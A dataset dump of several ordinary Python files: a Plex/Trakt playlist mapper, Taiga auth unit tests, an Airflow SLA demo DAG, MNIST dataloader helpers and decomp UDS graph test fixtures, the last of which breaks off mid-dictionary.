| id (stringlengths 3–8) | content (stringlengths 100–981k) |
|---|---|
11546186
|
from plugin.sync.core.playlist.mapper.handlers import PlexPlaylistHandler, TraktPlaylistHandler
from plex import Plex
import logging
import trakt.objects as t_objects
log = logging.getLogger(__name__)
class PlaylistMapper(object):
def __init__(self, task, p_sections_map):
self.task = task
self.p_sections_map = p_sections_map
self.plex = PlexPlaylistHandler(self.task)
self.trakt = TraktPlaylistHandler(self.task)
def expand(self, t_item):
t_type = type(t_item)
if t_type is t_objects.Show:
return self.expand_show(t_item)
if t_type is t_objects.Season:
return self.expand_season(t_item)
raise ValueError('Unknown item type: %r' % t_type)
def expand_show(self, t_show):
t_client = getattr(t_show, '_client', None)
# Retrieve the Plex show that matches `t_show`
p_keys = list(self.task.map.by_guid(t_show.pk))
if len(p_keys) < 1:
log.info('Unable to find show that matches guid: %r', t_show.pk)
return t_show
p_section_key, p_show_key = p_keys[0]
# Build dummy Trakt episodes for every Plex episode of `t_show`
t_episodes = {}
for p_episode in Plex['library/metadata'].all_leaves(p_show_key):
p_season = p_episode.season
t_season = t_objects.Season(t_client, [p_season.index], t_show.index)
t_season.show = t_show
t_episode = t_objects.Episode(t_client, [(p_season.index, p_episode.index)], t_show.index)
t_episode.show = t_show
t_episode.season = t_season
if p_season.index not in t_episodes:
t_episodes[p_season.index] = {}
t_episodes[p_season.index][p_episode.index] = t_episode
# Update trakt table
self.trakt.table[t_show.pk] = t_episodes
return t_episodes
def expand_season(self, t_season):
t_client = getattr(t_season, '_client', None)
t_show = t_season.show
# Retrieve the Plex show that `t_season` belongs to
p_keys = list(self.task.map.by_guid(t_show.pk))
if len(p_keys) < 1:
log.info('Unable to find show that matches guid: %r', t_show.pk)
return t_season
p_section_key, p_show_key = p_keys[0]
# Retrieve plex season that matches `t_season`
p_seasons = dict([
(p_season.index, p_season)
for p_season in Plex['library/metadata'].children(p_show_key)
])
p_season = p_seasons.get(t_season.pk)
if p_season is None:
log.info('Unable to find season that matches pk: %r', t_season.pk)
return t_season
# Create dummy Trakt episodes that match the available Plex episodes
t_episodes = {}
for p_episode in p_season.children():
t_episode = t_objects.Episode(t_client, [(p_season.index, p_episode.index)], t_season.index)
t_episode.show = t_season.show
t_episode.season = t_season
t_episodes[p_episode.index] = t_episode
# Update trakt table
self.trakt.table[t_show.pk][p_season.index] = t_episodes
return t_episodes
def get(self, key):
p_item = self.plex.get(*key) or (None, None)
t_item = self.trakt.get(*key)
if type(t_item) in [t_objects.Show, t_objects.Season]:
t_item = self.expand(t_item)
return p_item, t_item
def match(self):
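# Pairs playlist items from both services. Returns two lists of
# (key, order_index, (p_index, p_item), (t_index, t_item)) tuples:
# `t_items` for keys known to Trakt, `p_items` for keys only present in Plex.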
t_items = []
p_items = []
# Iterate over Trakt keys (ordered by index)
t_keys = self.trakt.keys_ordered()
t_keys_matched = []
index = 0
for t_index, key in enumerate(t_keys):
p_item, t_item = self.get(key)
for key, (p_index, p_item), t_item in self.select(key, p_item, t_item):
t_keys_matched.append(key)
t_items.append((key, index, (p_index, p_item), (t_index, t_item)))
index += 1
# Iterate over plex keys (that aren't in trakt)
p_keys = set(self.plex.items.keys()) - set(t_keys_matched)
for x, key in enumerate(p_keys):
p_item, t_item = self.get(key)
for key, (p_index, p_item), t_item in self.select(key, p_item, t_item):
t_keys_matched.append(key)
p_items.append((key, index, (p_index, p_item), (None, t_item)))
index += 1
return t_items, p_items
def select(self, base_key, p_items, t_items):
p_type = type(p_items)
t_type = type(t_items)
if p_type is not dict or t_type is not dict:
yield base_key, p_items, t_items
return
# Iterate over dictionaries
keys = set(p_items.keys()) | set(t_items.keys())
for i_key in keys:
key = base_key + (i_key,)
p_item = p_items.get(i_key, (None, None))
t_item = t_items.get(i_key)
for item in self.select(key, p_item, t_item):
yield item
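# Illustrative example (hypothetical objects): for nested episode tables,
#   select(('tt123',), {1: {1: (0, p_ep)}}, {1: {1: t_ep}})
# descends the matching dict levels and yields one tuple per leaf pair:
#   (('tt123', 1, 1), (0, p_ep), t_ep)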
|
11546193
|
import unittest
from unittest.mock import patch
import requests
import taiga.exceptions
from taiga import TaigaAPI
from .tools import MockResponse, create_mock_json
class TestAuthApp(unittest.TestCase):
@patch("taiga.client.requests")
def test_auth_success(self, requests):
requests.post.return_value = MockResponse(200, create_mock_json("tests/resources/auth_app_success.json"))
api = TaigaAPI(host="host")
api.auth_app("valid-app-id", "valid-app-secret", "valid-auth-code", "valid-state")
self.assertEqual(api.token, "<PASSWORD>")
@patch("taiga.client.requests")
def test_auth_not_success(self, requests):
requests.post.return_value = MockResponse(401, "Not allowed")
api = TaigaAPI(host="host")
self.assertRaises(
taiga.exceptions.TaigaRestException,
api.auth_app,
"valid-app-id",
"valid-app-secret",
"valid-auth-code",
"valid-state",
)
@patch("taiga.client.requests.post")
def test_auth_connection_error(self, requests_post):
requests_post.side_effect = requests.RequestException()
api = TaigaAPI(host="host")
self.assertRaises(
taiga.exceptions.TaigaRestException,
api.auth_app,
"valid-app-id",
"valid-app-pass",
"valid-auth-code",
"valid-state",
)
|
11546200
|
import time
from datetime import timedelta
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from airflow.utils.dates import timezone
def _sleep():
time.sleep(3)
default_args = {
'owner': 'dataength',
'start_date': timezone.datetime(2021, 3, 1),
'email': ['<EMAIL>'],
'sla': timedelta(seconds=10),
}
with DAG('test_sla',
default_args=default_args,
description='A simple pipeline demonstrating task-level SLAs',
schedule_interval='*/5 * * * *',
catchup=False) as dag:
first_check = PythonOperator(
task_id='first_check',
python_callable=_sleep,
sla=timedelta(seconds=2),
)
second_check = PythonOperator(
task_id='second_check',
python_callable=_sleep,
)
first_check >> second_check
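# Expected behaviour: _sleep takes ~3 seconds, so first_check (sla=2s) should
# record an SLA miss, while second_check inherits the 10-second SLA from
# default_args and should finish well within it.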
|
11546229
|
import torch
from torch.utils.data import sampler
from torchvision import datasets
from torch.utils.data import DataLoader
from torch.utils.data import SubsetRandomSampler
from torchvision import transforms
def get_dataloaders_mnist(batch_size, num_workers=0,
validation_fraction=None,
train_transforms=None,
test_transforms=None):
if train_transforms is None:
train_transforms = transforms.ToTensor()
if test_transforms is None:
test_transforms = transforms.ToTensor()
train_dataset = datasets.MNIST(root='data',
train=True,
transform=train_transforms,
download=True)
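# The validation set re-uses the training split but applies the (non-augmenting)
# test transforms; the disjoint index ranges below keep the two sets separate.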
valid_dataset = datasets.MNIST(root='data',
train=True,
transform=test_transforms)
test_dataset = datasets.MNIST(root='data',
train=False,
transform=test_transforms)
if validation_fraction is not None:
num = int(validation_fraction * 60000)
train_indices = torch.arange(0, 60000 - num)
valid_indices = torch.arange(60000 - num, 60000)
train_sampler = SubsetRandomSampler(train_indices)
valid_sampler = SubsetRandomSampler(valid_indices)
valid_loader = DataLoader(dataset=valid_dataset,
batch_size=batch_size,
num_workers=num_workers,
sampler=valid_sampler)
train_loader = DataLoader(dataset=train_dataset,
batch_size=batch_size,
num_workers=num_workers,
drop_last=True,
sampler=train_sampler)
else:
train_loader = DataLoader(dataset=train_dataset,
batch_size=batch_size,
num_workers=num_workers,
drop_last=True,
shuffle=True)
test_loader = DataLoader(dataset=test_dataset,
batch_size=batch_size,
num_workers=num_workers,
shuffle=False)
if validation_fraction is None:
return train_loader, test_loader
else:
return train_loader, valid_loader, test_loader
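# Hypothetical usage:
#   train_loader, valid_loader, test_loader = get_dataloaders_mnist(
#       batch_size=64, validation_fraction=0.1)
#   train_loader, test_loader = get_dataloaders_mnist(batch_size=64)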
|
11546275
|
import os
import pytest
from predpatt import PredPatt, PredPattOpts, load_conllu
from decomp.syntax.dependency import DependencyGraphBuilder
from decomp.semantics.predpatt import PredPattGraphBuilder
from decomp.semantics.uds import UDSSentenceGraph
@pytest.fixture
def graph_sentence():
return 'The police commander of Ninevah Province announced that bombings had declined 80 percent in Mosul , whereas there had been a big jump in the number of kidnappings .'
@pytest.fixture
def normalized_sentence_graph(rawtree,
listtree,
normalized_sentence_annotations):
node_ann, edge_ann = normalized_sentence_annotations
ud = DependencyGraphBuilder.from_conll(listtree, 'tree1')
pp = PredPatt(next(load_conllu(rawtree))[1],
opts=PredPattOpts(resolve_relcl=True,
borrow_arg_for_relcl=True,
resolve_conj=False,
cut=True))
pp_graph = PredPattGraphBuilder.from_predpatt(pp, ud, 'tree1')
graph = UDSSentenceGraph(pp_graph, 'tree1')
graph.add_annotation(*node_ann['tree1'])
graph.add_annotation(*edge_ann['tree1'])
return graph
@pytest.fixture
def raw_sentence_graph(rawtree,
listtree,
raw_sentence_annotations):
node_ann, edge_ann = raw_sentence_annotations
ud = DependencyGraphBuilder.from_conll(listtree, 'tree1')
pp = PredPatt(next(load_conllu(rawtree))[1],
opts=PredPattOpts(resolve_relcl=True,
borrow_arg_for_relcl=True,
resolve_conj=False,
cut=True))
pp_graph = PredPattGraphBuilder.from_predpatt(pp, ud, 'tree1')
graph = UDSSentenceGraph(pp_graph, 'tree1')
graph.add_annotation(*node_ann['tree1'])
graph.add_annotation(*edge_ann['tree1'])
return graph
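# Note: the two fixtures above build identical PredPatt graphs and differ only
# in which annotation set (normalized vs. raw) is attached.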
@pytest.fixture
def rawtree(test_data_dir):
fpath = os.path.join(test_data_dir, 'rawtree.conllu')
with open(fpath) as f:
return f.read()
@pytest.fixture
def listtree(rawtree):
return [l.split() for l in rawtree.split('\n')]
@pytest.fixture
def graph_syntax_nodes():
return {'tree1-syntax-1': {'Definite': 'Def',
'PronType': 'Art',
'domain': 'syntax',
'form': 'The',
'lemma': 'the',
'position': 1,
'type': 'token',
'upos': 'DET',
'xpos': 'DT'},
'tree1-syntax-10': {'Mood': 'Ind',
'Tense': 'Past',
'VerbForm': 'Fin',
'domain': 'syntax',
'form': 'had',
'lemma': 'have',
'position': 10,
'type': 'token',
'upos': 'AUX',
'xpos': 'VBD'},
'tree1-syntax-11': {'Tense': 'Past',
'VerbForm': 'Part',
'domain': 'syntax',
'form': 'declined',
'lemma': 'decline',
'position': 11,
'type': 'token',
'upos': 'VERB',
'xpos': 'VBN'},
'tree1-syntax-12': {'NumType': 'Card',
'domain': 'syntax',
'form': '80',
'lemma': '80',
'position': 12,
'type': 'token',
'upos': 'NUM',
'xpos': 'CD'},
'tree1-syntax-13': {'Number': 'Sing',
'domain': 'syntax',
'form': 'percent',
'lemma': 'percent',
'position': 13,
'type': 'token',
'upos': 'NOUN',
'xpos': 'NN'},
'tree1-syntax-14': {'domain': 'syntax',
'form': 'in',
'lemma': 'in',
'position': 14,
'type': 'token',
'upos': 'ADP',
'xpos': 'IN'},
'tree1-syntax-15': {'Number': 'Sing',
'domain': 'syntax',
'form': 'Mosul',
'lemma': 'Mosul',
'position': 15,
'type': 'token',
'upos': 'PROPN',
'xpos': 'NNP'},
'tree1-syntax-16': {'domain': 'syntax',
'form': ',',
'lemma': ',',
'position': 16,
'type': 'token',
'upos': 'PUNCT',
'xpos': ','},
'tree1-syntax-17': {'domain': 'syntax',
'form': 'whereas',
'lemma': 'whereas',
'position': 17,
'type': 'token',
'upos': 'SCONJ',
'xpos': 'IN'},
'tree1-syntax-18': {'domain': 'syntax',
'form': 'there',
'lemma': 'there',
'position': 18,
'type': 'token',
'upos': 'PRON',
'xpos': 'EX'},
'tree1-syntax-19': {'Mood': 'Ind',
'Tense': 'Past',
'VerbForm': 'Fin',
'domain': 'syntax',
'form': 'had',
'lemma': 'have',
'position': 19,
'type': 'token',
'upos': 'AUX',
'xpos': 'VBD'},
'tree1-syntax-2': {'Number': 'Sing',
'domain': 'syntax',
'form': 'police',
'lemma': 'police',
'position': 2,
'type': 'token',
'upos': 'NOUN',
'xpos': 'NN'},
'tree1-syntax-20': {'Tense': 'Past',
'VerbForm': 'Part',
'domain': 'syntax',
'form': 'been',
'lemma': 'be',
'position': 20,
'type': 'token',
'upos': 'VERB',
'xpos': 'VBN'},
'tree1-syntax-21': {'Definite': 'Ind',
'PronType': 'Art',
'domain': 'syntax',
'form': 'a',
'lemma': 'a',
'position': 21,
'type': 'token',
'upos': 'DET',
'xpos': 'DT'},
'tree1-syntax-22': {'Degree': 'Pos',
'domain': 'syntax',
'form': 'big',
'lemma': 'big',
'position': 22,
'type': 'token',
'upos': 'ADJ',
'xpos': 'JJ'},
'tree1-syntax-23': {'Number': 'Sing',
'domain': 'syntax',
'form': 'jump',
'lemma': 'jump',
'position': 23,
'type': 'token',
'upos': 'NOUN',
'xpos': 'NN'},
'tree1-syntax-24': {'domain': 'syntax',
'form': 'in',
'lemma': 'in',
'position': 24,
'type': 'token',
'upos': 'ADP',
'xpos': 'IN'},
'tree1-syntax-25': {'Definite': 'Def',
'PronType': 'Art',
'domain': 'syntax',
'form': 'the',
'lemma': 'the',
'position': 25,
'type': 'token',
'upos': 'DET',
'xpos': 'DT'},
'tree1-syntax-26': {'Number': 'Sing',
'domain': 'syntax',
'form': 'number',
'lemma': 'number',
'position': 26,
'type': 'token',
'upos': 'NOUN',
'xpos': 'NN'},
'tree1-syntax-27': {'domain': 'syntax',
'form': 'of',
'lemma': 'of',
'position': 27,
'type': 'token',
'upos': 'ADP',
'xpos': 'IN'},
'tree1-syntax-28': {'Number': 'Plur',
'domain': 'syntax',
'form': 'kidnappings',
'lemma': 'kidnapping',
'position': 28,
'type': 'token',
'upos': 'NOUN',
'xpos': 'NNS'},
'tree1-syntax-29': {'domain': 'syntax',
'form': '.',
'lemma': '.',
'position': 29,
'type': 'token',
'upos': 'PUNCT',
'xpos': '.'},
'tree1-syntax-3': {'Number': 'Sing',
'domain': 'syntax',
'form': 'commander',
'lemma': 'commander',
'position': 3,
'type': 'token',
'upos': 'NOUN',
'xpos': 'NN'},
'tree1-syntax-4': {'domain': 'syntax',
'form': 'of',
'lemma': 'of',
'position': 4,
'type': 'token',
'upos': 'ADP',
'xpos': 'IN'},
'tree1-syntax-5': {'Number': 'Sing',
'domain': 'syntax',
'form': 'Ninevah',
'lemma': 'Ninevah',
'position': 5,
'type': 'token',
'upos': 'PROPN',
'xpos': 'NNP'},
'tree1-syntax-6': {'Number': 'Sing',
'domain': 'syntax',
'form': 'Province',
'lemma': 'Province',
'position': 6,
'type': 'token',
'upos': 'PROPN',
'xpos': 'NNP'},
'tree1-syntax-7': {'Mood': 'Ind',
'Tense': 'Past',
'VerbForm': 'Fin',
'domain': 'syntax',
'form': 'announced',
'lemma': 'announce',
'position': 7,
'type': 'token',
'upos': 'VERB',
'xpos': 'VBD'},
'tree1-syntax-8': {'domain': 'syntax',
'form': 'that',
'lemma': 'that',
'position': 8,
'type': 'token',
'upos': 'SCONJ',
'xpos': 'IN'},
'tree1-syntax-9': {'Number': 'Plur',
'domain': 'syntax',
'form': 'bombings',
'lemma': 'bombing',
'position': 9,
'type': 'token',
'upos': 'NOUN',
'xpos': 'NNS'}}
@pytest.fixture
def graph_normalized_semantics_nodes():
return {'tree1-semantics-arg-0': {'domain': 'semantics',
'frompredpatt': False,
'type': 'argument'},
'tree1-semantics-arg-11': {'domain': 'semantics',
'frompredpatt': True,
'type': 'argument'},
'tree1-semantics-arg-13': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': 1.0,
'value': -1.147},
'arg-kind': {'confidence': 1.0,
'value': -1.147},
'arg-particular': {'confidence': 1.0,
'value': 1.1619}},
'type': 'argument'},
'tree1-semantics-arg-15': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': 1.0,
'value': -1.147},
'arg-kind': {'confidence': 1.0,
'value': 1.1619},
'arg-particular': {'confidence': 1.0,
'value': 1.1619}},
'type': 'argument'},
'tree1-semantics-arg-23': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': 1.0,
'value': -1.147},
'arg-kind': {'confidence': 1.0,
'value': -1.147},
'arg-particular': {'confidence': 1.0,
'value': 1.1619}},
'type': 'argument'},
'tree1-semantics-arg-3': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': 1.0,
'value': -1.147},
'arg-kind': {'confidence': 1.0,
'value': -1.147},
'arg-particular': {'confidence': 1.0,
'value': 1.1619}},
'type': 'argument'},
'tree1-semantics-arg-9': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': 1.0,
'value': -1.147},
'arg-kind': {'confidence': 1.0,
'value': -1.147},
'arg-particular': {'confidence': 1.0,
'value': 1.1619}},
'type': 'argument'},
'tree1-semantics-arg-author': {'domain': 'semantics', 'frompredpatt': False, 'type': 'argument'},
'tree1-semantics-arg-addressee': {'domain': 'semantics',
'frompredpatt': False,
'type': 'argument'},
'tree1-semantics-pred-11': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'pred-dynamic': {'confidence': 1.0,
'value': 0.7748},
'pred-hypothetical': {'confidence': 1.0,
'value': -1.5399},
'pred-particular': {'confidence': 1.0,
'value': 0.7748}},
'type': 'predicate'},
'tree1-semantics-pred-20': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'pred-dynamic': {'confidence': 1.0,
'value': -1.5399},
'pred-hypothetical': {'confidence': 1.0,
'value': 0.7748},
'pred-particular': {'confidence': 1.0,
'value': -1.54}},
'type': 'predicate'},
'tree1-semantics-pred-7': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'pred-dynamic': {'confidence': 1.0,
'value': 0.7748},
'pred-hypothetical': {'confidence': 1.0,
'value': -1.54},
'pred-particular': {'confidence': 1.0,
'value': 0.7748}},
'type': 'predicate'},
'tree1-semantics-pred-root': {'domain': 'semantics',
'frompredpatt': False,
'type': 'predicate'}}
@pytest.fixture
def graph_raw_semantics_nodes():
return {'tree1-semantics-arg-0': {'domain': 'semantics',
'frompredpatt': False,
'type': 'argument'},
'tree1-semantics-arg-11': {'domain': 'semantics',
'frompredpatt': True,
'type': 'argument'},
'tree1-semantics-arg-13': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-kind': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-particular': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}}},
'type': 'argument'},
'tree1-semantics-arg-15': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-kind': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-particular': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}}},
'type': 'argument'},
'tree1-semantics-arg-23': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-kind': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-particular': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}}},
'type': 'argument'},
'tree1-semantics-arg-3': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-kind': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-particular': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}}},
'type': 'argument'},
'tree1-semantics-arg-9': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-kind': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-particular': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}}},
'type': 'argument'},
'tree1-semantics-arg-addressee': {'domain': 'semantics',
'frompredpatt': False,
'type': 'argument'},
'tree1-semantics-arg-author': {'domain': 'semantics',
'frompredpatt': False,
'type': 'argument'},
'tree1-semantics-pred-11': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'pred-dynamic': {'confidence': {'genericity-pred-annotator-88': 4},
'value': {'genericity-pred-annotator-88': 0}},
'pred-hypothetical': {'confidence': {'genericity-pred-annotator-88': 4},
'value': {'genericity-pred-annotator-88': 0}},
'pred-particular': {'confidence': {'genericity-pred-annotator-88': 4},
'value': {'genericity-pred-annotator-88': 0}}},
'type': 'predicate'},
'tree1-semantics-pred-20': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'pred-dynamic': {'confidence': {'genericity-pred-annotator-88': 0},
'value': {'genericity-pred-annotator-88': 1}},
'pred-hypothetical': {'confidence': {'genericity-pred-annotator-88': 0},
'value': {'genericity-pred-annotator-88': 1}},
'pred-particular': {'confidence': {'genericity-pred-annotator-88': 0},
'value': {'genericity-pred-annotator-88': 1}}},
'type': 'predicate'},
'tree1-semantics-pred-7': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'pred-dynamic': {'confidence': {'genericity-pred-annotator-88': 4},
'value': {'genericity-pred-annotator-88': 0}},
'pred-hypothetical': {'confidence': {'genericity-pred-annotator-88': 4},
'value': {'genericity-pred-annotator-88': 0}},
'pred-particular': {'confidence': {'genericity-pred-annotator-88': 4},
'value': {'genericity-pred-annotator-88': 0}}},
'type': 'predicate'},
'tree1-semantics-pred-root': {'domain': 'semantics',
'frompredpatt': False,
'type': 'predicate'}}
@pytest.fixture
def graph_normalized_semantics_edges():
return {('tree1-semantics-arg-0', 'tree1-semantics-pred-20'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'head'},
('tree1-semantics-arg-0', 'tree1-semantics-pred-7'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'head'},
('tree1-semantics-arg-11', 'tree1-semantics-pred-11'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'head'},
('tree1-semantics-pred-11', 'tree1-semantics-arg-13'): {'domain': 'semantics',
'frompredpatt': True,
'protoroles': {'awareness': {'confidence': 1.0,
'value': -0.0},
'change_of_location': {'confidence': 1.0,
'value': -0.0},
'change_of_possession': {'confidence': 1.0,
'value': -0.0},
'change_of_state': {'confidence': 0.1675,
'value': 0.0032},
'change_of_state_continuous': {'confidence': 0.1675,
'value': 0.0032},
'existed_after': {'confidence': 0.6796,
'value': 0.0111},
'existed_before': {'confidence': 0.6796,
'value': 0.0111},
'existed_during': {'confidence': 1.0,
'value': 1.3421},
'instigation': {'confidence': 1.0,
'value': -0.0},
'partitive': {'confidence': 0.564,
'value': -0.0941},
'sentient': {'confidence': 1.0,
'value': -0.9348},
'volition': {'confidence': 1.0,
'value': -0.0},
'was_for_benefit': {'confidence': 1.0,
'value': -0.0},
'was_used': {'confidence': 0.564,
'value': -0.0}},
'type': 'dependency'},
('tree1-semantics-pred-11', 'tree1-semantics-arg-15'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'dependency'},
('tree1-semantics-pred-11', 'tree1-semantics-arg-9'): {'domain': 'semantics',
'frompredpatt': True,
'protoroles': {'awareness': {'confidence': 0.1395,
'value': -0.0549},
'change_of_location': {'confidence': 0.1395,
'value': -0.0549},
'change_of_possession': {'confidence': 1.0,
'value': -0.3909},
'change_of_state': {'confidence': 0.3333,
'value': -0.0085},
'change_of_state_continuous': {'confidence': 0.0791,
'value': -0.0351},
'existed_after': {'confidence': 0.6567,
'value': 0.124},
'existed_before': {'confidence': 1.0,
'value': 1.3954},
'existed_during': {'confidence': 1.0,
'value': 1.3959},
'instigation': {'confidence': 1.0,
'value': -1.5074},
'partitive': {'confidence': 0.0791,
'value': -0.1354},
'sentient': {'confidence': 1.0,
'value': -1.508},
'volition': {'confidence': 1.0,
'value': -0.3909},
'was_for_benefit': {'confidence': 0.3418,
'value': 0.0008},
'was_used': {'confidence': 0.3333,
'value': -0.0085}},
'type': 'dependency'},
('tree1-semantics-pred-20', 'tree1-semantics-arg-23'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'dependency'},
('tree1-semantics-pred-7', 'tree1-semantics-arg-11'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'dependency'},
('tree1-semantics-pred-7', 'tree1-semantics-arg-3'): {'domain': 'semantics',
'frompredpatt': True,
'protoroles': {'awareness': {'confidence': 1.0,
'value': 1.3526},
'change_of_location': {'confidence': 0.272,
'value': -0.0922},
'change_of_possession': {'confidence': 0.7724,
'value': -0.0},
'change_of_state': {'confidence': 0.2067,
'value': -0.0548},
'change_of_state_continuous': {'confidence': 1.0,
'value': -0.0},
'existed_after': {'confidence': 1.0,
'value': 1.3527},
'existed_before': {'confidence': 1.0,
'value': 1.3527},
'existed_during': {'confidence': 1.0,
'value': 1.3557},
'instigation': {'confidence': 1.0,
'value': 1.3557},
'partitive': {'confidence': 0.1148,
'value': -0.0018},
'sentient': {'confidence': 1.0,
'value': 1.354},
'volition': {'confidence': 1.0,
'value': 1.3545},
'was_for_benefit': {'confidence': 0.1976,
'value': -0.0504},
'was_used': {'confidence': 0.4373,
'value': -0.0207}},
'type': 'dependency'},
('tree1-semantics-pred-root', 'tree1-semantics-arg-0'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'dependency'},
('tree1-semantics-pred-root', 'tree1-semantics-arg-addressee'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'dependency'},
('tree1-semantics-pred-root', 'tree1-semantics-arg-author'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'dependency'}}
@pytest.fixture
def graph_raw_semantics_edges():
return {('tree1-semantics-arg-0', 'tree1-semantics-pred-20'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'head'},
('tree1-semantics-arg-0', 'tree1-semantics-pred-7'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'head'},
('tree1-semantics-arg-11', 'tree1-semantics-pred-11'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'head'},
('tree1-semantics-pred-11', 'tree1-semantics-arg-13'): {'domain': 'semantics',
'frompredpatt': True,
'protoroles': {'awareness': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'change_of_location': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'change_of_possession': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'change_of_state': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'change_of_state_continuous': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'existed_after': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'existed_before': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'existed_during': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'instigation': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'partitive': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'sentient': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'volition': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'was_for_benefit': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'was_used': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}}},
'type': 'dependency'},
('tree1-semantics-pred-11', 'tree1-semantics-arg-15'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'dependency'},
('tree1-semantics-pred-11', 'tree1-semantics-arg-9'): {'domain': 'semantics',
'frompredpatt': True,
'protoroles': {'awareness': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'change_of_location': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'change_of_possession': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'change_of_state': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'change_of_state_continuous': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'existed_after': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'existed_before': {'confidence': {'protoroles-annotator-14': 1,
